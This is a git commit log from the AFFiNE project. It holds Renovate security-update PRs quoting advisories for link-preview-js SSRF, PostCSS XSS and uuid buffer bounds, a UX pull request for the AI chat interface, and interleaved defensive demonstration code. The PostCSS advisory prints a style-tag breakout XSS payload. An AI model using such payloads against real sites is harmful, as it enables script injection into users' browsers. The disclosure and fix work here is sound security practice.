[https://github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)
-
[https://github.com/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>OP-Engineering/link-preview-js (link-preview-js)</summary>

###
[`v4.0.1`](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)

[Compare
Source](https://redirect.github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1)

#### What's Changed

- Loopback fixes by
[@&#8203;ospfranco](https://redirect.github.com/ospfranco) in
[#&#8203;179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)

**Full Changelog**:
<https://github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-07 11:29:35 +08:00
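
The link-preview-js advisory above (CVE-2026-43897) says a hostname regex cannot close the DNS case and that callers should resolve the host and validate the result before fetching. As an added example (not code from link-preview-js or AFFiNE), the JavaScript below vets resolved addresses, covering IPv6 loopback and IPv4 embedded in IPv6; all function names and the sample records in the comments are assumptions made up for the illustration.

```javascript
// Added example: decide whether the addresses a hostname resolved to may be
// fetched. Function names are hypothetical, not part of any library.

// Dotted-quad IPv4 -> [b0, b1, b2, b3], or null. Leading zeros are rejected
// because some parsers read them as octal.
function parseIPv4(text) {
  const parts = text.split('.');
  if (parts.length !== 4) return null;
  const bytes = parts.map((p) => (/^(0|[1-9]\d{0,2})$/.test(p) ? Number(p) : 256));
  return bytes.every((b) => b <= 255) ? bytes : null;
}

// One side of an IPv6 literal -> array of 16-bit groups, or null.
// A trailing dotted quad (::ffff:127.0.0.1) becomes two groups.
function parseGroups(side, allowV4Tail) {
  if (side === '') return [];
  const items = side.split(':');
  const groups = [];
  for (let i = 0; i < items.length; i++) {
    if (items[i].includes('.')) {
      const v4 = i === items.length - 1 && allowV4Tail ? parseIPv4(items[i]) : null;
      if (!v4) return null;
      groups.push((v4[0] << 8) | v4[1], (v4[2] << 8) | v4[3]);
    } else if (/^[0-9a-fA-F]{1,4}$/.test(items[i])) {
      groups.push(parseInt(items[i], 16));
    } else {
      return null;
    }
  }
  return groups;
}

// IPv6 literal -> eight 16-bit groups, or null. Accepts [..] and %zone.
function parseIPv6(text) {
  const bare = text.replace(/^\[|\]$/g, '').split('%')[0];
  const sides = bare.split('::');
  if (sides.length > 2) return null;
  if (sides.length === 1) {
    const all = parseGroups(sides[0], true);
    return all && all.length === 8 ? all : null;
  }
  const head = parseGroups(sides[0], false);
  const tail = parseGroups(sides[1], true);
  if (!head || !tail || head.length + tail.length > 7) return null;
  return [...head, ...new Array(8 - head.length - tail.length).fill(0), ...tail];
}

// Reason an IPv4 address must not be fetched, or null if none applies.
function internalV4Reason([a, b]) {
  if (a === 0) return 'unspecified (0.0.0.0/8)';
  if (a === 127) return 'loopback (127.0.0.0/8)';
  if (a === 10) return 'private (10.0.0.0/8)';
  if (a === 172 && b >= 16 && b <= 31) return 'private (172.16.0.0/12)';
  if (a === 192 && b === 168) return 'private (192.168.0.0/16)';
  if (a === 169 && b === 254) return 'link-local (169.254.0.0/16)';
  if (a === 100 && b >= 64 && b <= 127) return 'shared address space (100.64.0.0/10)';
  if (a >= 224) return 'multicast or reserved (224.0.0.0/3)';
  return null;
}

// Same for IPv6, including the forms that carry an IPv4 address inside.
function internalV6Reason(g) {
  const zeroUntil = (n) => g.slice(0, n).every((x) => x === 0);
  if (zeroUntil(7) && g[7] === 0) return 'unspecified (::)';
  if (zeroUntil(7) && g[7] === 1) return 'loopback (::1)';
  if (zeroUntil(6)) return 'IPv4-compatible (::/96, deprecated)';
  const mapped = zeroUntil(5) && g[5] === 0xffff; // ::ffff:0:0/96
  const nat64 = g[0] === 0x64 && g[1] === 0xff9b && g.slice(2, 6).every((x) => x === 0);
  if (mapped || nat64) {
    const inner = internalV4Reason([g[6] >> 8, g[6] & 0xff]);
    return inner ? `embedded IPv4 ${inner}` : null;
  }
  if ((g[0] & 0xfe00) === 0xfc00) return 'unique local (fc00::/7)';
  if ((g[0] & 0xffc0) === 0xfe80) return 'link-local (fe80::/10)';
  if ((g[0] & 0xff00) === 0xff00) return 'multicast (ff00::/8)';
  return null;
}

// Reason `address` is off-limits, or null. Anything unparseable fails closed.
function internalReason(address) {
  const v4 = parseIPv4(address);
  if (v4) return internalV4Reason(v4);
  const v6 = parseIPv6(address);
  return v6 ? internalV6Reason(v6) : 'not a valid IP literal';
}

// Vet every address string the resolver returned for `hostname`, for example
// the `address` fields from Node's dns.lookup(hostname, { all: true }).
// One internal record is enough to refuse the whole name.
function vetResolution(hostname, addresses) {
  if (addresses.length === 0) return { allowed: false, reason: `${hostname}: no addresses` };
  for (const address of addresses) {
    const reason = internalReason(address);
    if (reason) return { allowed: false, reason: `${hostname} -> ${address}: ${reason}` };
  }
  // Connect to the vetted address itself rather than the name, so a second
  // lookup cannot return a different record than the one checked here.
  return { allowed: true, connectTo: addresses[0] };
}

// Constructed usage: vetResolution('a.example', ['203.0.113.10', '10.0.0.5'])
// is refused because of the second record.
```

The check runs on the resolved address, not on the hostname text, which is why it also covers names outside the `.internal`, `.local`, `.nip.io` and `.sslip.io` suffixes the patch blocks.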
Adarsh Singh 440ff0c342 fix(editor): resolve UX inconsistencies in the AI chat interface (#14850)
# Closes #14189.

Fixes the three UX issues reported in the original bug report, plus one
small
adjacent polish on the right-sidebar toggle that was requested during
review.

Each concern in the issue is addressed end-to-end, with the same
treatment
applied to both places the AI chat panel lives: the **sidebar chat
panel**
(right panel on a doc page) and the **standalone `/chat` page**.

---

## 1. `+` button → persistent multi-session tabs (issue point 1)

**Before:** clicking `+` called `createFreshSession()` (standalone) or
`newSession()` (sidebar), both of which tore down the current chat
content
and replaced it in place. There was no way to keep two chats open at
once.

**After:** a browser/IDE-style tab strip lives above the chat content.
Each
open session gets its own tab with a close `×`; the active tab is
highlighted; `+` now adds a tab rather than replacing the chat.

### Details
- New Lit component `ai-chat-tabs`
([packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts)).
- Tab title is derived from `session.title` → first user message → `"New
chat"`.
- Horizontal scroll when tabs overflow, with a `wheel` handler that
converts
    mouse wheel / trackpad vertical swipe into horizontal scroll (native
horizontal trackpad swipes also work natively via `overflow-x: auto`).
- Auto `scrollIntoView({ inline: 'nearest' })` on active tab change, so
a
newly created or newly selected tab slides into view instead of staying
    hidden behind the toolbar.
- Close `×` removes the tab from the strip but leaves the session on the
server (matches the existing **Chat history** dropdown semantics — the
session is still reachable there). Closing the active tab switches to an
    adjacent one; closing the last tab starts a fresh session.
- Persistence: open session IDs are saved per-workspace in
`localStorage`
under `ai-chat-open-tabs:{workspaceId}`. On mount, the React pages
hydrate
  those IDs via `AIProvider.session.getSession` /
  `CopilotClient.getSession` — no new backend or schema work.
- Wiring: identical effects on both variants
([chat.tsx
(sidebar)](packages/frontend/core/src/desktop/pages/workspace/detail-page/tabs/chat.tsx)
and
[chat/index.tsx
(standalone)](packages/frontend/core/src/desktop/pages/workspace/chat/index.tsx))
  — hydrate → sync active session into tabs → persist.
- The tab strip sits on the same row as the existing toolbar icons
  (pin / history / `+`), separated by `flex: 1` + `min-width: 0` so the
  tabs scroll cleanly up to the toolbar boundary.
- The `ShadowlessElement` base class injects its static CSS globally,
and the
`:host` selector does not match in a React-rooted DOM — the component
uses
  tag-selector CSS (`ai-chat-tabs { display: flex; … }`) instead.

## 2. Drag-and-drop attachments (issue point 2)

**Before:** the chat input accepted no DnD. Attaching anything required
the
`+` → file-picker flow.

**After:** the chat input accepts OS files via native HTML5 DnD and
AFFiNE
documents via the repo's existing pragmatic-drag-and-drop
infrastructure.

### Details
- Native handlers (`dragenter/over/leave/drop`) on
  [ai-chat-input.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-input/ai-chat-input.ts)
  accept OS files: images go into the image preview grid, other files become
  attachment chips, with the same 50 MB per-file cap as the `+` picker.
- Internal AFFiNE document drags from the nav panel land as doc chips,
  handled via `dropTargetForElements` from
  `@atlaskit/pragmatic-drag-and-drop` (same library the rest of the app
  already uses for internal DnD).
- A "Drop to attach" overlay appears during drag, reusing the existing
focused-border token (`--affine-v2-layer-insideBorder-primaryBorder`)
for
  visual consistency with the focused state.
- The image/file routing logic that previously lived inline in
  `add-popover.ts` was factored into a shared helper
  [attachment-utils.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-chips/attachment-utils.ts)
  (`addFilesToChat`), so the `+` picker and the drop handler stay in
  lockstep.
- Analytics: extended the `addEmbeddingDoc.control` union in
[events.ts](packages/frontend/track/src/events.ts) with `'dragDrop'` so
  drag-originated attachments are distinguishable from button-initiated
  ones in telemetry.
- `@atlaskit/pragmatic-drag-and-drop` is promoted from a transitive
  dependency (via `@affine/component`) to a direct dependency of
  `@affine/core` and `yarn.lock` is refreshed accordingly.

## 3. Chat-history tooltip + icon (issue point 3)

**Before:** hovering the chat-history button showed a tooltip whose
background did not invert for dark theme (`--affine-tooltip` is not
theme-aware), and the icon was `ArrowDownSmallIcon` — a chevron that
does
not convey "history."

**After:** the tooltip primitive itself is theme-aware (every tooltip in
the app benefits, not just the chat one), and the icon is the
semantically-clear `HistoryIcon`.

### Details
- [tooltip.ts](blocksuite/affine/components/src/tooltip/tooltip.ts) now
uses
  `var(--affine-v2-tooltips-background, var(--affine-tooltip))` and
  `var(--affine-v2-tooltips-foreground, var(--affine-white))`. The V2
  tokens auto-invert with theme; the old vars remain as fallbacks so
  components that override via the existing `tooltipStyle` escape hatch
  continue to work.
- Triangle arrow colors updated to use the same V2 token.
- [ai-chat-toolbar.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-toolbar.ts):
  `ArrowDownSmallIcon` → `HistoryIcon`; added
  `data-testid="ai-panel-chat-history"` for future e2e coverage.

## 4. Right-sidebar toggle: tooltips + open-state icon *(adjacent polish)*

Not part of the original issue, but surfaced while testing the tab strip —
neither of the two right-sidebar toggle buttons had hover affordance, and
both used the same icon regardless of the sidebar's state.

- Added `tooltip="Open sidebar"` on the route-container button shown
when
  the sidebar is hidden.
- Added `tooltip="Close sidebar"` on the sidebar-header button shown
when
  the sidebar is expanded.
- The close button now renders a small inline `RightSidebarOpenIcon`
  variant: same outline as `RightSidebarIcon`, but with the right panel
  filled in the AFFiNE accent color to convey the open state. Icon shape
  change is self-contained — no new icon asset added to
  `@blocksuite/icons`.

---

## Commits

- `2adc0c7` — fix(ai-chat): theme-aware tooltip + semantic chat-history
icon *(2 files)*
- `bf26974` — feat(ai-chat): drag-and-drop file and doc attachments in
chat input *(7 files)*
- `fca29c8` — feat(ai-chat): persistent multi-session tab strip *(8
files)*
- `7d5dffe` — feat(workbench): tooltips and open-state icon for the
right-sidebar toggle *(2 files)*

Kept ordered smallest → largest blast radius so the history is easy to
bisect.

---

## Test plan

Verified locally against a fresh server stack (postgres / redis /
mailpit via
compose, migrations run) signed in as `dev@affine.pro`, in both `/chat`
and
the sidebar chat on a doc page, in light and dark themes:

- [x] Tooltip: hover the chat-history icon in dark mode → tooltip is
dark-on-light; toggle to light mode → tooltip is light-on-dark. Existing
tooltips on other surfaces (slash menu, edgeless, linked-doc) still
render correctly.
- [x] Icon: chat-history button renders the history glyph (clock), not a
chevron.
- [x] Drag-and-drop (OS file): drop a PDF / PNG / TXT onto the input →
overlay shows → chips/images appear; file > 50 MB → rejected silently
(same as `+` picker).
- [x] Drag-and-drop (internal doc): drag an AFFiNE doc from the nav
panel → becomes a doc chip.
- [x] Pin-picker, `+` picker, paste-image — all unchanged.
- [x] Tab strip: first chat auto-becomes a tab on first message; `+`
adds tab; click tab switches chat; `×` removes tab and switches to
adjacent; close last tab → new fresh tab spawns.
- [x] Reload browser → tab strip rehydrates from localStorage with the
same sessions.
- [x] Tab overflow: 12+ tabs → horizontal scroll via trackpad vertical
swipe, trackpad horizontal swipe, and mouse wheel; active tab
auto-scrolls into view on `+` click.
- [x] Right-sidebar: hover both toggle buttons → tooltips appear; open
the sidebar → close button shows the filled right-panel icon.
- [x] `yarn lint:ox` and lint-staged both clean on every commit.

Not verified locally (no local model key configured): the assistant
actually
streams a response. Drop/chip flow is independent of that path.

## Out of scope / follow-ups

- No new unit or Playwright tests — the fixes are visually verifiable
and
  reuse existing reducer / state paths. Happy to add tests if reviewers
  prefer.
- `@affine/native` is not required for the web dev stack; I only built
  `@affine/server-native`. Irrelevant to the PR diff.


## Summary by CodeRabbit

* **New Features**
* Multi-tab chat UI with a tabs component, open/close/switch actions,
and per-workspace persistence/restoration.
  * Drag-and-drop attachments into chat input (files and docs).

* **UI/UX**
  * Tooltip theming moved to v2 variables (includes arrow color).
  * Sidebar toggle/close buttons now show tooltips.
  * “Drop to attach” overlay and updated history icon.

* **Behavior**
  * Unified attachment handling with 50MB validation and toast notices.

* **Analytics**
  * Attachment events record drag-and-drop as a control method.

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 04:04:43 +08:00
DarkSky d64f368623 feat(server): refactor copilot (#14892)
#### PR Dependency Tree


* **PR #14892** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-04 00:36:47 +08:00
DarkSky fb6291cb15 fix: deps dedup 2026-05-03 23:35:57 +08:00
DarkSky 0ccfacbc29 feat(docs): migrate bs docs 2026-04-29 17:23:23 +08:00
renovate[bot] bf6fc66943 chore: bump up postcss version to v8.5.10 [SECURITY] (#14877)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [postcss](https://postcss.org/) ([source](https://redirect.github.com/postcss/postcss)) | [`8.5.6` → `8.5.10`](https://renovatebot.com/diffs/npm/postcss/8.5.6/8.5.10) | ![age](https://developer.mend.io/api/mc/badges/age/npm/postcss/8.5.10?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/postcss/8.5.6/8.5.10?slim=true) |

---

### PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
[CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305) /
[GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

<details>
<summary>More information</summary>

#### Details
##### PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output

##### Summary

PostCSS v8.5.5 (latest) does not escape `</style>` sequences when
stringifying CSS ASTs. When user-submitted CSS is parsed and
re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS
values breaks out of the style context, enabling XSS.

##### Proof of Concept

```javascript
const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes
```

**Tested output** (Node.js v22, postcss v8.5.5):
```
Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true
```

##### Impact

Impact non-bundler use cases since bundlers for XSS on their own.
Requires some PostCSS plugin to have malware code, which can inject XSS
to website.

##### Suggested Fix

Escape `</style` in all stringified output values:
```javascript
output = output.replace(/<\/(style)/gi, '<\\/$1');
```

##### Credits
Discovered and reported by [Sunil Kumar](https://tharvid.in)
([@TharVid](https://redirect.github.com/TharVid))

#### Severity
- CVSS Score: 6.1 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`

#### References
-
[https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305)
-
[https://github.com/postcss/postcss/releases/tag/8.5.10](https://redirect.github.com/postcss/postcss/releases/tag/8.5.10)
-
[https://github.com/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>postcss/postcss (postcss)</summary>

###
[`v8.5.10`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8510)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.9...8.5.10)

- Fixed XSS via unescaped `</style>` in non-bundler cases (by
[@TharVid](https://redirect.github.com/TharVid)).

###
[`v8.5.9`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#859)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.8...8.5.9)

- Speed up source map encoding parsing in case of the error.

###
[`v8.5.8`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#858)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.7...8.5.8)

- Fixed `Processor#version`.

###
[`v8.5.7`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#857)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.6...8.5.7)

- Improved source map annotation cleaning performance (by CodeAnt AI).

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-27 11:32:36 +08:00
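
The PostCSS advisory quoted in the commit message above comes down to how an HTML parser ends a `<style>` element. The sketch below is an added example, not code from PostCSS or from this repository: it models that parsing rule in simplified form and applies the advisory's suggested escape, using the advisory's own proof-of-concept string plus one constructed mixed-case input. All function names are hypothetical.

```javascript
// Added illustration; not PostCSS code. Function names are hypothetical.

// The escape from the advisory's "Suggested Fix": break every "</style" sequence.
// In CSS, "\/" is an escaped "/", so string values keep their meaning.
function escapeStyleClose(css) {
  return css.replace(/<\/(style)/gi, '<\\/$1');
}

// Simplified model of the HTML tokenizer rule for <style>: raw text ends at the
// first "</style" followed by whitespace, "/" or ">" (matched case-insensitively).
function splitAtStyleEnd(html) {
  const open = '<style>';
  if (!html.startsWith(open)) {
    throw new TypeError('expected markup that starts with <style>');
  }
  const body = html.slice(open.length);
  const end = /<\/style[\t\n\f\r \/>]/i.exec(body);
  if (end === null) return { css: body, rest: '' };
  const gt = body.indexOf('>', end.index);
  return {
    css: body.slice(0, end.index),                 // what the browser treats as CSS
    rest: gt === -1 ? '' : body.slice(gt + 1),     // what it goes on to parse as HTML
  };
}

function embedInStyleTag(css, escape) {
  return `<style>${escape ? escapeStyleClose(css) : css}</style>`;
}

// The CSS string from the advisory's proof of concept, and a constructed
// mixed-case variant with a space before ">".
const POC_CSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const MIXED_CASE_CSS = 'a::after { content: "</StYlE ><p>"; }';

// Compare what ends up outside the style element with and without the escape.
function report(css) {
  const raw = splitAtStyleEnd(embedInStyleTag(css, false));
  const fixed = splitAtStyleEnd(embedInStyleTag(css, true));
  return {
    rawLeaksMarkup: raw.rest.length > 0,
    fixedLeaksMarkup: fixed.rest.length > 0,
    fixedCss: fixed.css,
  };
}

console.log(report(POC_CSS));
console.log(report(MIXED_CASE_CSS));
```

The same check can serve as a regression test for any code path that places stringified CSS inside a `<style>` element.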
renovate[bot] df482c9cf2 chore: bump up uuid version to v14 [SECURITY] (#14870)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [uuid](https://redirect.github.com/uuidjs/uuid) | [`^13.0.0` → `^14.0.0`](https://renovatebot.com/diffs/npm/uuid/13.0.0/14.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/uuid/14.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/uuid/13.0.0/14.0.0?slim=true) |

---

### uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided

[GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

<details>
<summary>More information</summary>

#### Details
##### Summary

`v3`, `v5`, and `v6` accept external output buffers but do not reject
out-of-range writes (small `buf` or large `offset`).
By contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on
invalid bounds.

This inconsistency allows **silent partial writes** into caller-provided
buffers.

##### Affected code

- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds
validation.
- `src/v6.ts` writes `buf[offset + i]` without bounds validation.

##### Reproducible PoC

```bash
cd /home/StrawHat/uuid
npm ci
npm run build

node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"
```

Observed:

- `v4 THREW RangeError`
- `v5 NO_THROW`
- `v6 NO_THROW`

Example partial overwrite evidence captured during audit:

```text
same true buf [
  170, 170, 170, 170,
   75, 224, 100,  63
]
v6 [
  187, 187, 187, 187,
   31,  19, 185,  64
]
```

##### Security impact

- **Primary**: integrity/robustness issue (silent partial output).
- If an application assumes full UUID writes into preallocated buffers,
this can produce malformed/truncated/partially stale identifiers without
error.
- In systems where caller-controlled offsets/buffer sizes are exposed
indirectly, this may become a security-relevant logic flaw.

##### Suggested fix

Add the same guard used by `v4`/`v1`/`v7`:

```ts
if (offset < 0 || offset + 16 > buf.length) {
  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
}
```

Apply to:

- `src/v35.ts` (covers `v3` and `v5`)
- `src/v6.ts`

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq)
-
[https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://redirect.github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34)
-
[https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://redirect.github.com/uuidjs/uuid/releases/tag/v14.0.0)
-
[https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>uuidjs/uuid (uuid)</summary>

###
[`v14.0.0`](https://redirect.github.com/uuidjs/uuid/blob/HEAD/CHANGELOG.md#1400-2026-04-19)

[Compare
Source](https://redirect.github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0)

##### Security

- Fixes
[GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq):
`v3()`, `v5()`, and `v6()` did not validate that writes would remain
within the bounds of a caller-supplied buffer, allowing out-of-bounds
writes when an invalid `offset` was provided. A `RangeError` is now
thrown if `offset < 0` or `offset + 16 > buf.length`.

##### ⚠ BREAKING CHANGES

- `crypto` is now expected to be globally defined (requires
node@20+)
([#935](https://redirect.github.com/uuidjs/uuid/issues/935))
- drop node@18 support
([#934](https://redirect.github.com/uuidjs/uuid/issues/934))
- upgrade minimum supported TypeScript version to 5.4.3, in keeping with
the project's policy of supporting TypeScript versions released within
the last two years

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-26 00:48:53 +08:00
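
The uuid advisory quoted in the commit message above turns on a JavaScript detail: an out-of-range indexed write to a typed array is silently ignored, so a `buf[offset + i]` loop with no guard produces a partial write instead of an error. The sketch below is an added example, not code from the uuid package: `writeUnchecked` is a stand-in for the pattern the advisory describes, the guard is the one from its suggested fix, and the 16 sample bytes are constructed.

```javascript
// Added illustration; not uuid's source. Function names are hypothetical.

// Stand-in for the write loop the advisory describes in src/v35.ts and src/v6.ts:
// 16 bytes are copied to buf[offset + i] with no bounds validation.
function writeUnchecked(bytes, buf, offset = 0) {
  for (let i = 0; i < 16; ++i) {
    buf[offset + i] = bytes[i]; // out-of-range typed-array writes are dropped silently
  }
  return buf;
}

// The guard from the advisory's suggested fix.
function assertUuidRange(buf, offset = 0) {
  if (offset < 0 || offset + 16 > buf.length) {
    throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
  }
}

function writeChecked(bytes, buf, offset = 0) {
  assertUuidRange(buf, offset);
  return writeUnchecked(bytes, buf, offset);
}

// Constructed sample: 16 recognisable bytes standing in for a UUID (0xa0..0xaf).
const SAMPLE_UUID_BYTES = Uint8Array.from({ length: 16 }, (_, i) => 0xa0 + i);

// Same shape as the advisory's PoC: an 8-byte buffer and offset 4.
function demoSmallBuffer() {
  const unchecked = new Uint8Array(8).fill(0xee);
  writeUnchecked(SAMPLE_UUID_BYTES, unchecked, 4);

  const checked = new Uint8Array(8).fill(0xee);
  let thrown = null;
  try {
    writeChecked(SAMPLE_UUID_BYTES, checked, 4);
  } catch (err) {
    thrown = err.name;
  }
  return {
    uncheckedResult: Array.from(unchecked), // 4 stale bytes followed by 4 UUID bytes
    checkedThrew: thrown,                   // 'RangeError'
    checkedResult: Array.from(checked),     // untouched: the guard runs before any write
  };
}

// A buffer with room for the full 16 bytes passes the guard and is written completely.
function demoValidBuffer() {
  const buf = new Uint8Array(32);
  writeChecked(SAMPLE_UUID_BYTES, buf, 16);
  return Array.from(buf.subarray(16));
}

console.log(demoSmallBuffer());
console.log(demoValidBuffer());
```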
renovate[bot] 557b1e4dfc chore: bump up eslint-plugin-oxlint version to v1.60.0 (#14853)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.58.0` → `1.60.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.58.0/1.60.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.60.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.58.0/1.60.0?slim=true) |

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.60.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.60.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

###
[`v1.59.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.59.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

